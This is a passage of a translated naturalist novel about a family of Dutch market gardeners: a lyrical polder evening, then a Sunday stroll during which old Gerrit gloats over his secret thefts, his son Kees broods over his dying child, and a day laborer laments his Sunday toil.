Vesper bells rang lightly in endless tenderness, like the silvering choir-echo of angelus voices. And very far off, on the dusking circle-rim of the polder basin, the villages grew lonely, grew timid in pale gray. The cattle, splashing languidly in a sea of mist, dotted away in graying vaporousness, ever smaller.

A few hay wagons far off on the dike swayed, dull in the evening's mist-purple land-vapor. Sweet scents swooned up from the cooling earth, rocked about. Little chirpers, very softly, in intermingled jubilant peeping, flew to and fro through the grass, streaked the evening land with thin little songs, a silvering hum of fiddles and aeolian harps.

Ever darker the polder sank away, lonely in night-dark.

Cricket drone-song made melody everywhere and nowhere, broken evening sounds. Wind-whisper rustled round, told something in the stirred sough of night-glimmer, and from the little town faint noises came blowing, breaking on the swell of polder-rest, evening stillness borne on the rhythm of eternity.

Evening noises, vague and vacant, strayed away in the dark meadow-round, and ever softer whisper trembled over darkening earth-green. Softer died the rustling prayer of reeds in the pools, the soft, secret-tender rustle of ears and stalks.

And closer to the earth the sky descended, ever lower, lower, gray-misty, flowing into the darkening meadow-green, purple-tender, shivered through with evening-holy stillness.

Far realm of god-wide stillness in misty evening noise, wept through for a moment by a cow's lowing, very far, sounding from a dark meadow, rustled round again by reed-song and stalk-whisper.

And silently, terrible in silence, on the horizon, there rose an uprising of mute silhouettes, shadows of workers, dark afterimages of toil, a dark stealing-away of people, voicelessly vanishing into the evening-purple of the immeasurable polder night.

CHAPTER SIX.

Old Gerrit walked around in his garden behind the yard, looking at the beans. In a tree-grown corner Kees and Dirk stood in their Sunday clothes gawking at the currant and raspberry bushes. Stiffly in a black jacket, gold watch chain on his Sunday waistcoat, Dirk stepped along beside Kees, who walked with him in shabbily patched trousers and a greenish faded pea-jacket. Old Gerrit hobbled about contentedly in Sunday restfulness, surveyed his little place with pleasure. The strawberries had gone rather well. Dirk had settled up with him, counted it out stingily, and the drinking, he thought, had grown less with him. Guurt had the money locked fast, better than he himself. For he had long since noticed that Dirk, the snarling silent Dirk, would rather settle up with him than with his sister, who watched the pennies like a miracle, as her dull mother had in the old days.

Where it was all going to end with the wife now?.. ho-ho!.. he didn't rightly know himself! She was getting dafter and dafter! He only half knew it himself. What it might be.. going once.. going twice!.. but the strawberries had gone well and the beans stood splendid.. Those beans! they had to make the year good for him, that was certain. That ugly Doctor Troost, that busybody, ho! ho! had said to him.. why don't you grow nothing but strawberries?.. But he'd have another think coming! that blatherskite!.. put all your earnings on one risk! Who was that daft?.. If only the beans went well!.. and the lads brought home what was taken in.. Now Piet went to town the whole week.. That went much betterer! he sometimes reckoned up half as much again as Dirk! And when it had to be paid out in November.. see once if he'd get there this year, though he had debt and debt and debt again. Though he stood blazing ugly before it! But what now? should he.. should he fret today?.. today? there was rest now.. rest, now he had to look, look!

Dirk and Kees sauntered past him. The lads found it pleasant, in the sweltering Sunday morning, to stroll quietly and blissfully idle about the land, among their own crops and tidied-up place. To gawk at the growing; to see everything that was needed, and yet not lift a hand. So it seemed pure pleasure to draw breath, in the midst of the land's scents and the sun's gold.

The strawberry had had its biggest haul. There was still some basketing to do every morning and evening, but now the currants glowed up again and the gooseberries swelled gold, and the dew-dull raspberries with their homesick scent of rose-sweetness purpled everywhere on the bushes among the green. They had a fine fruit corner, carefully weeded all round. Before Old Gerrit's churchgoing the three of them wanted to stroll round the block. Dirk had already grumbled a bit. The Old Man threw off his dirty jacket, had Guurt bring him his tight-creased black broadcloth coat. Gentlemanly, with a greenish fancy hat on his silver curls, in a narrow coat that strained under his arms and across his chest, he came down the yard, gesturing stiffly and walking stiff as a rake, as if his ticker might burst at every step. All three smoked, pinched slobbery wads at the tips of their cigars, and the greenish grimy cracked hands, callused and sinewed in the gray faded tint of earth-rooting, clawed stiffly out from under the Sunday sleeves. Three in a row, step by step, the stroll went through Droogeweg, the back-corner garden quarter of Wiereland.

On both sides along Droogeweg lane, sunned through gold-fierce, market gardens greened on dune soil, bumpy and sloping, here and there torn through by wild-sandy, bare patches. Jubilant-blue the sky shone out, and the silver-gray of willows and beech-green along the lane's edges trembled in the fierce stream of light. Still lay the Sunday road, the narrow red-earth path sparkled through with summer fire and sun-sparks. On either side, deep toward the back, the sunny, gold-green glittering kitchen gardens and orchards, amid the ditch-furrowed dune soil torn through with gold sand, low-rolling and flowing-tender of line, where bare-grown root-twists of crooked, cursed willows clawed out from under bush-wild growth. Along the whole lane the little gardeners' farmsteads sunned hot, small and roofed in bright red-flame, between deep-running drive-paths that glowed purple-sandy against the gold sand of the dune valley. The low dune slid away there, splendid in its rolling, femininely fine curves of line, svelte and tender, above which wide sky-blue rejoiced, sea-wide, above green, green, all green, currant-red and purple.
All the little drives in front of sun-glowing farmsteads wound there on both sides, overgrown high with wild finery of bush and flower, behind which the blazing little gables hallowed in Sunday rest, fiercely happy, light-rejoicing, yet musing, dead-calm in summer glory.

Late July thundered sweltering heat and sun-gold onto the close-grown crop-green, blazed through trees, bush-wild and clusters of flowers, in colorful glow. Behind and among the green, the divine radiant jubilant green, everywhere, of trees and grass, crops and dune moss, the little farmsteads sheltered in a white-gold haze, starred about with yellow and red blossoms; marigolds and steaming gillyflower, snow-fierce white, and all-glowing sweet william. Red and high-purple rejoiced in the little drives, in bright blaze of sunniness. And the banked, rolling dune in its tender-feminine slope-line, downed about with green cherishing, trembled, overpoured with magical summer fire. It sparked along the ditches behind the little houses, yellow and gold, poppy-fire and bright-purple in bouquets.

Scabious and white silver bindweeds, pure little snow-vases, lit up in the green shrubbery between grass and wild flower-bloom. Deep within, the silver-white, the gold-white, the glitter-snowy bindweed, now here, now there, snowed above the splendid green, motionless and pure as snow-covered little host-chalices.

Step, step, the men slowly ambled along the gardens on the red-sandy path, silent, each lost in his own drowse of thought. Kees, quiet and musing, thought of Wimpie, wept inside and smothered a fit of rage that the little fellow was not with him. And Dirk, ever hotter for the Grint girls, was glad he had still held back a few coppers for the fair in mid-August, to treat them. Still his hands itched when he thought of that wretched cousin Willem, who was always in his way there with the tasty Geert.

Old Gerrit drowsed on, feeling uneasy beside his sons. He was simply used to taking a little stroll alone on Sundays before church. Then there was always something for him to pinch. Small things, true, but in summer it couldn't be otherwise, with so much bustle and so many curious eyes. And now he was thwarted again by the gawking lads, whom he hadn't wanted to refuse a turn round the corner, and with whom it would end up in a dram anyway.

Now everything chafed in him. First about his miserable ailing wife, who only gorged and swilled and cost money and could no longer lift a finger; who sat shrunk there in the house like a corpse on her chair, in a corner by the stable. He just couldn't understand why that woman went on living.. A bundle of rickety bones and tongs without flesh, swilling coffee, with her musty mug open and shut, and drooling, nothing but drooling. And not a minute's awareness! or would she be forever spying on him? Then it chafed in him that at the photographer's opposite Bekkema's little place, where he looked over the flowers, he had pulled a stupid trick on that fellow. There he always drank a nice cup of coffee toward eleven now. Now he had seen at that fellow's a very pretty, brand-new gold ten-guilder piece lying in a little box, just loosely, and he had neatly filched it! The first time in his whole life that he had pinched money. It had also shone so, glittered out so splendidly, that he couldn't keep his eyes off it. No, he had felt at once that he had to take that gold piece, cost what it might. Three days after the pinching he had suddenly noticed that the photographer no longer spoke to him so heartily, and no longer made any portrait of his head. He had seen, very slyly, from all sorts of little traits and sayings, that the man distrusted him, never left him alone in the studio anymore, or if he did it once, always locked the door of his little darkroom. That made him afraid, uneasy, though he sometimes wanted to hide that fear from himself. He now groped in vague anxiety.. whether he had given the fellow grounds for suspicion, though he didn't understand why the man dared to suspect him; him with his gray head, his best of names, his long years of living there? But there was more, still more, that chafed in him. He had stolen two rows of bulbs, dug up out of the ground at Bukkus's, right behind his garden..

Lord, that had been a night! ho-ho! But he had them all the same.. very rare bulbs! For what had to be, he had to have exactly!.. One row.. worth a couple hundred guilders!.. ho-ho!.. But what good were they to him? In the cellar they'd rot away.. the gold piece lay there splendid! splendid! right on top of the little spoons! But those bulbs? no good at all!.. There they lay, ho-ho! what good were they to him? At first it had only been lovely, blissful, that he had such riches in the little strongbox.. such dear little beauties! pinched just like that! And to chuck them back, no, he couldn't bring himself to that either.

What a Lord-Jesus-high row they had kicked up in the village! Now it was all that far behind again!.. ho-ho! but then! The police!.. they'd haunted round like daft ones! And complain! complain! that Bukkus did, to him.. That had been pure pleasure. Didn't happen much, that there was stealing just like that! But now it had been fun all the same. Then they came shouting at him that it was frightful, horrible.. that they ought to hang the fellow. And he.. his mug set in a fold, stiffly shaking his own head and cursing along.. that it was a disgrace.. Oh! he could have burst with pleasure, with bliss like that. And the fellow spitting at him, beside himself, screaming with rage.. And he muttering to himself.. that he knew where they lay, lay, just at the very moment the fellow was crying to him about it!.. And all Wiereland was in uproar, a riot, of fours and fives and never enough. That he would never ever forget! He, with the whole caboodle lying there quietly.. so quietly.. those miraculous-dear bulbs.. that said nothing at all.. and then to see the whole lot for yourself running about and snuffling round and searching and screaming and bawling like sheep! And he joining in the lament, so that when he heard his own voice he got a fright, stood dumbfounded at his own falseness, yet laughed again with pleasure, blissful pleasure.. because he had them.. right next to him. And.. that he could take them in his hands like that, whenever he wanted, he, the one the whole village was daft about.. and nobody at all could make head or tail of it. That had been a blissful pleasure!.. But Lord, he'd have to watch out all the same.. That wife of his might be spying.. on account of one thing and another.. Lord.. that went that far.. ho-ho! accidents are bad chances?.. going once, going twice.. that could all go to pieces.. If only that wife didn't play dumb.. only to beat him with it.. But.. but hadn't the doctor formally said she seemed to have lost her natural wits for good? Well yes! hu-hu! that was a wretched-good warning, that! eh?

The two doctors both said the very same! Then he shouldn't let himself be put off his stroke like that!.. ho-ho! But when he looked properly, wasn't there something about Kees? about his looking? Didn't he have him in his sights now? Lord Christ, what a fright he'd stood.. last week.. every night? Each time he thought he saw Kees so lifelike before his peepers. And by day he saw Kees forever spying on him! And not a word the fellow said! not one blessed word! And when he, out of fear, turned about him.. so as to get a word out of him, he was surly.. But nothing came out! And Piet?.. Piet? Hadn't he snapped at him much more.. than usual?.. Could he?.. could he have caught on to something?.. Oh! he should just let it blow over!.. it was nothing but timidness! The lads knew nothing at all! nothing! not a scrap!

Dirk and Kees had stopped on the path before a chunk of dune, broad and gold-sandy, half sloping away behind twisted, misgrown willows. A man in a blue smock stood toiling there in the sweltering sunblaze.

—What now, Beemster?.. desecrating the Sabbath?.. Kees jeered.
Beemster looked up, started when he saw Kees's poacher's mug. But now, in daylight, he didn't want to show any fear of the fellow.

—Well, man, will you do it then? I'll gladly let you have the dirty job!

—Thank you kindly, laughed Kees, that's not worth a thing?

Dirk, silent, cow-slow, looked down on Beemster's wriggling work-hands. Old Gerrit had stopped beside Kees. Now he felt fine again after all, that he, on a Sunday, had no potatoes to weed.

—Are they lates?

—That's right, but at that corner you've got broad beans.. standing fine, eh?..

—It's a damned dirty job, that's what it is! the day laborer shouted to the lads in the lane, —there goes your Sunday!.. I see no wife, no child.. Now I slave from sunrise anyway! till night, for my thieves' wage, eh?.. And to be able to eat a bite myself in winter.. I've got to dig potatoes for my own grub.. That's the same every Sunday, the one little hour you've got left over for your own work. Over yonder stand Bolk and Hannes Skrepel and Piet Steinstroa.. and Gais! there's never rest!

—That's right, Kees called back, deep-voiced and resonant, struck with sorrowful gravity by the drudging and the sweat-dripping glowing head of Beemster.
The worker left off weeding a moment, sprang up from the ground, out from between his rows, looked at Kees. Sun scorched his head, on which the sweat now gleamed in fat drops, as if hailed down on cheeks and temples.

—Look, yonder, round the corner here, stands Gais from the Binnenpad, the runner for „De Dageroad”, he slaves himself into a fit.. He's got five guilders a week yet! from his carting.. from six in the evening till eleven.. twelve, eh?.. and in the morning a couple of hours.. when it has to be!..

Now by day he's got a little hole of a shop! but.. they fleece him! and don't pay! Now he's lost his last penny! He can go begging, plain and simple!.. From those five guilders for coke.. from those six for peat.. from those two for wood.. like that.. from month to month, eh?.. well, in the end.. he thought.. to hell with you and your sweets-counter! He rented a little patch of ground!.. Now he plants some cabbage, potatoes.. and that he works.. on Sunday! and now comes the curate and says that.. that's called Sabbath-breaking!.. What! says he! Seeing to it.. that you don't starve clean to death in winter, says he!.. is that a sin? Well.. in the week he can't lift a paw at it.. says he, no more than me!.. now he works till evening! now.. I've got a sour crust of bread.. but him.. his is a hand's worth worse yet..

He had bent down again between his rows, and, tearing up, his hand rooted out the weeds. Behind him stood the early potatoes in bloom of luminous purple. A fine flower-scent steamed up from the sandy, bumpy ground, eaten into by sun-glow. The low leaves greened dark, and songfully the blossom-purple rejoiced under the fire-fierce sky-blue.

His plot stood neglected! In the fierce strawberry rush he hadn't been able to work on it even Sunday mornings, not a finger's worth. Now the mess choked with weeds and filth. Old Gerrit only peered, rubbed along his beard, said nothing, dead to Beemster's torment and drudging. He didn't even see his hot-steaming, wet, sweating head that gleamed bronze-red in the sun-singe. He didn't feel that the fellow, in his digging, was digging the heat up out of the ground into his own throat. He only peered at the lads, whether there wasn't something by the roadside for him to snatch. There had been a heat-itch in his thieving hands for so long already. The summer drudgery had long since stuck in his throat. He longed for the autumn, for the planting of bulbs, when everything stood so unguarded in the field, tools and goods.

—And plague-hard ground it is here, the Sunday-morning toiler on the dune patch complained again, talking bent over as he weeded, —you can slave here with a pickaxe, and then it still.. still comes to nothing!

—I know that, I know that.. laughed Dirk, looking down good-naturedly on the worker, who stayed sitting there scorched, sighing and squatting, in a crippling crawl, pinched in between the narrow potato rows. Kees felt something burn in his throat, something like pity for Beemster. But quickly that stirring rankled away into vague hatred and spite against everything; that his Wimpie lay struck down there, every day paler, weaker, more wretched. Every day the child sang more, and every day he cursed and railed more fiercely at the wife and the filthy lump of a mother-in-law. He did his work, sluggish, indifferent, though the others thought it right on the mark. But under all his working he saw Wimpie on his little bed or in the creaking pram, in the sunshine, singing and dying, yellowed, grayed, wasted. And always in little prayers, with that soft little voice, also blessing and praying for the soul of his father. Again and again Kees choked back a howl of rage because he no longer dared to lash out wildly through it. For when he saw that mumbling and muttering on the pale little lips, he felt like giving the little fellow a clout that would leave him staring dumbfounded. His dear little lad, forever dipping his skeleton hands in the holy-water font.. that mad gazing at those little images of the Sacred Heart.. His dear little lad praying for him, for his salvation. For all he cared they could lay his carcass to float in a stinking ditch like a dead dog, it was still good enough for him. Enough to drive you mad when the wife nagged and tormented him and said that Wimpie stayed so sick and could never get better because of his godlessness. At such moments he could, in murderous lust and blood-drunk dizziness, shove a knife between her ribs, the bitch! Somewhat later then, calmed by a march through the dunes, he understood that the little fellow couldn't help it; didn't know what he was doing. In all his raw hatred, which shuddered over him like a frenzy, he sometimes felt that quite purely. But all at once, that the little fellow looked ever more wretched, more dreadful, out of his yellow-sick eyes..
He no longer heard the dull grumbling voice of the Sunday toiler on the dune, who kept on talking, jolting for breath, comforted a little already that he could pour out his bitter misery to another. Dirk only shook his head, half listening and drowsing sleepily on the blazing spot. Old Gerrit kept wanting to move on.

Grumbling and sluggish, they finally ambled on. Delicious, the bedstraw steamed about in sweet scents, and sunny-hot glowed the red-sandy shaded path, in forest-damp summer drench, full of sweet pine smell, warm and tingling with woodland-soil scent. Still, the little drives of blazing farmsteads dreamed in the god-stillness of Sunday land. Behind gray-gleaming willows, poplars and the snow-silvering rustle of wondrous white-velvet abeles, behind bushes and grass-flowers, the little currant trees sparkled, whimsically sunned, in spiraling splendid gleam, bright red; everywhere little coral clusters, jubilant red, gleam-trembling with gold-bright sunning.

Among the lush green of crops, the little trees clambered squatly up. Bush-low, in thronging clusters, the fiery berries hung down to the earth, clustering lavishly in sun-red and shadow-red. Everywhere, on both sides of the lane, ever farther, ever deeper, in hazy, shady summer gold, the market gardens blazed with that wondrously whimsical finery of little fruits, with their bright gleam-red, behind the wild high bloom of lilac and white campion, gold-dusted yellow of bird's-foot trefoil, and the sweet finery of sweet william; behind a swarm of purple, sweet-